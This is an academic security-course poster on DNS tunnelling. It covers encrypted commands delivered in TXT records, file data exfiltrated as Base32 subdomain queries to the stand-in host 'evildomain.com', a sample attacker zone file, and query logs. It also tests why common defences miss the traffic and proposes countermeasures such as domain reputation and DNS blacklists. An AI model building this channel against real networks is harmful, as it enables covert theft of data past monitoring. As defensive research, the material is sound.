NANOG32 - DNS Anomalies and Their Impacts on DNS Cache Servers
Minieri CS6262 Project Poster
1. jminieri@gatech.edu
Corporate Name Server
Infected PC
Evil Name Server
Network Anomaly
Detection System
Next Generation
FirewallNetwork Intrusion
Prevention System
Internet
Data Exfiltration
Command & Control
Laboratory Environment
Conclusion & Countermeasures
Exfiltrating the Data
Infected Client:
1. Receives encrypted/encoded instructions from DNS query
“get SensitiveData.doc”= Base64Decode( AES128( id, Ksec,”wq8Hx50ab4TGOaWwEBhZO...” ))
2. Performs commands:
2a. Break SensitiveData.doc into blocks
2b. EncodedBlock = Base32Encode( AES128( id, Ksec, “get SensitiveData.doc”))
2c. Query EncodedBlock.evildomain.com
Evil Name Server:
1. Collects query logs for results:
query: 2ox4ttglxoxyxbrix2pbd4o4gtmkq56lakoo3pjnnhetwwibrlaa.evildomain.com IN A +
query: r7wbrme3udzoczqelfoqnx7qxysexynokg6eiotjy3mur7zrd3la.evildomain.com IN A +
query: zvev2wpzmfgcpbgboxi3yw3ivtgjaxf2eg3xumitf3xzetzn5uaa.evildomain.com IN A +
query: mzxnbmy73fjz6umqrgzstqatkm7ngifmdfxqwnnq52fekhzjod5a.evildomain.com IN A +
query: 4sjpqctnj6keacrt4jklpjpnyea67o76bgjyvjdj4odjcfngxlra.evildomain.com IN A +
query: 4hv2hu6ywklsclcs2xnsygrzmbpjz5ormdr27dfe24zwvglww5wa.evildomain.com IN A +
query: jrcnfvfxg7uieih7wtf3ecl3f2ux5f2zup2bwnrtm3fsv3cz7oca.evildomain.com IN A +
2. Reconstructs original data
Implementing a Stealthy C&C Channel
Infected Client:
1. Registers with Evil Name Server, Receives ID [clientid]
2. Queries clientid.evildomain.com for its instructions
Evil Name Server:
1. Populates TXT record for clientid with commands to execute
Base64Encode( AES128( id, Ksec, “get SensitiveData.doc”))
Background
Next-Generation Firewall -
- Does not see data exfiltration traffic as a Threat
- Only records DNS transactions as “traffic” mixed with other legitimate DNS traffic
- No alerts that exfiltration occurred
Network Anomaly Detection
- Basic thresholds are too high to detect activity
- Pushing thresholds for a group/network low causes false positives
- Baselining individual hosts is inaccurate on networks using DHCP
Network Intrusion Prevention System
- Signature based, no signatures for this type of traffic, no alerts
- May record DNS queries in general, but those queries are mixed with legitimate DNS traffic
The modern network security infrastructure remains inadequate to protect networks from this
vector of data loss.
Based on the advances in the areas of web content filtering and SPAM reduction, similar strategies
should be employed for the filtering and blocking of suspicious or unauthorized DNS queries:
Focus on the domain name:
1. Domain Name Reputation Service –
When was the domain registered? (recent = low reputation)
Who is the registrar? (are they reputable?)
How frequently are DNS records updated? (short TTL could suggest Fast Flux)
Age of specific DNS record. (new additions may be suspicious, old records may be trustworthy)
Links from known trusted sites (not search engines)
2. Domain Name Real Time Black Hole Service -
Implement DNS-based blackhole list (DNSBL)
3. Domain Name Categorization Service -
Domains are categorized based on content (similar to web content)
Domain administrators allow/deny queries based on categorization
Focus on network behavior:
1. Unusually high volumes of DNS traffic
Baseline of what is usual needs to be determined
White list capability to allow known CDN traffic
Not good against small amounts of data
These services should be integrated directly into bind; current services integrate with web content
filtering or mail relays.
Covert Channel – clandestine use of a shared resource to exchange information (e.g. tweaking bits
in an IP header, hiding a file in a cake!)
Domain Name Service – a ubiquitous system providing hostname to IP lookup services for devices
connecting to the Internet. (e.g. www.gatech.edu -> 130.207.160.29)
Why DNS as a covert channel?
- It’s used on every network connecting to the Internet
- Security Administrators must allow DNS traffic to ingress/egress a network perimeter
- RFC’s specify many flexible record types
- Many software vendors and content providers utilize this flexibility in the delivery of their products
Due to the assorted legitimate uses of DNS and the variety of of queries and response record
formats required by the RFC’s, detecting compliant but malicious DNS queries and
responses is difficult!
Network Anomaly Detection System
Next-Generation Firewall
RFC Compliant DNS
transactions are all
grouped together
No Threats Detected,
just DNS traffic
captured
Evildomain.com’s
$ORIGIN evildomain.com.
$TTL 3600
evildomain.com. SOA ns.evildomain.com. root (
20130311001 ; serial
900 ; refresh
600 ; retry
86400 ; expiry
3600 ) ; minimum
NS ns.evildomain.com.
; A 192.168.1.1
;
ns A 192.168.1.1
;
www A 172.16.1.1
1234567890123456 TXT wq8Hx50ab4TGOaWwEBhZOH/92EiiH3UgDpWj6FdBUNE=
1234567890123456 A 172.16.1.66
* A 172.16.1.66
Encrypted Command for
clientid 1234567890123456
DNS Wildcard record
prevents NXDOMAIN
messages as clients
exfiltrate data
Searching DNS Query Logs:
query: a1ad0a23d76406ca643d9131e3cb41272.profile.jfk5.cloudfront.net IN A +
query: a872519f3b7190734526511bebb226f0e.profile.sin2.cloudfront.net IN A +
query: a7ec25bb89c4452fb63759d20363071f5.profile.ewr2.cloudfront.net IN A +
query: ad572852c5270fac72fd9d8b2cfd3d306.profile.sin2.cloudfront.net IN A +
query: a875e52d696ae8e0ce28cd36a213daa57.profile.mia50.cloudfront.net IN A +
query: a18045c17467024a514b0ab79ecaa58e0.profile.sfo9.cloudfront.net IN A +
query: afa9724d8183a5f1c35353150682a23db.profile.sin3.cloudfront.net IN A +
query: af7575720d6325c162aa90008428ac27b.profile.iad12.cloudfront.net IN A +
query: a6e4c5b345cf0cbb25bf2711448bef95c.profile.fra6.cloudfront.net IN A +
query: a0a2a114aa395186ad2454d65879b9f7a.profile.jfk6.cloudfront.net IN A +
query: a42ce5df4536f21e11771d686469c6645.profile.lhr5.cloudfront.net IN A +
query: a5b3b21b9270043c539cfeabf26187996.profile.jfk1.cloudfront.net IN A +
query: a93b6a052e8c62437184f95a46227f1ae.profile.sea50.cloudfront.net IN A +
query: a9bc2b695ffb0e4a6d263be602bc27dfe.profile.stl2.cloudfront.net IN A +
query: a437f389280fe78c662d69017428c10d5.profile.syd1.cloudfront.net IN A +
query: a2fe3288bc1cf62ba63001dddfdcdb6ad.profile.nrt53.cloudfront.net IN A +
query: o2cmkso25fpbvm3h7qh7mjzmatjpve6u6gamlxbxj6pbhsufvgma.evildomain.com IN A +
query: dpasrf4e45duoma4cn37cmgcpafu6k4yqrt6gbm2nsnsg6anog3a.evildomain.com IN A +
query: rkd3cuxqbhneofaiu7g4ntqko5ksput6tm2yh5bxce6suwsert7q.evildomain.com IN A +
query: y4gaqwy7fz2nznmvlrpcjdmlgqxh2qec2sdz5n6yjgcm73lqpylq.evildomain.com IN A +
query: 7z74bbryi4evuc4zijblhf5eokttrel4sb7atuiiyezo4sp3ddhq.evildomain.com IN A +
query: v3nsmyoe4ip475ajbdjku3rjdt3s7innupyro57kdyra5y3z43oq.evildomain.com IN A +
query: xd6kkjm2jzzgbdf5mockkwetmmouqqlfw77nvn2g55bd4moktw3q.evildomain.com IN A +
query: gwunhw52v7v2ukfnhjxfq6uuk5nx4klciyqoyrza46w464q636qa.evildomain.com IN A +
query: da2xcedrixvwodam5el3pqh4prjck6hkghdzvsyulctitxvd3tgq.evildomain.com IN A +
query: kda3bxbc4rjsyyt2pcbdcqwnpm2ing5effvp24kbpgpvrnklio2a.evildomain.com IN A +
query: nfcsd7eylchbysavyd226vewp7si2wapigztpngug2mwjqdzetqq.evildomain.com IN A +
query: fktl5gt5whuzjof6rjdd4p4nl2n4tc6a725x6z4ojnmsfitsdpkq.evildomain.com IN A +
query: rhucuss5ltvl6ro6fihbezjfaicylazfswe5p5hv6eum353dkzla.evildomain.com IN A +
query: 7br6hg23wbzxya7oupimz5ofq57krsw4ahvblfqsodt2r4nkjunq.evildomain.com IN A +
query: 5rft2mx4lejdjccmemwqgdfykbwpgfku4sev2kb6rzs7adl4cxcq.evildomain.com IN A +
query: ntqa7b4n434zqbwdndxgq2xkxd5ws4daerqbhtrobess4uqq6ovq.evildomain.com IN A +
Exfiltrated data looks too much
like normal content delivery
network traffic; hostname entropy
detection yields false positives.
Network Intrusion Prevention System
Only DNS queries detected, no
DNS based threats; too much
query traffic to sort through
DNS traffic shows increase in flow report,
but overall volume of traffic is too low to
generate an alert or cause analysts to
notice.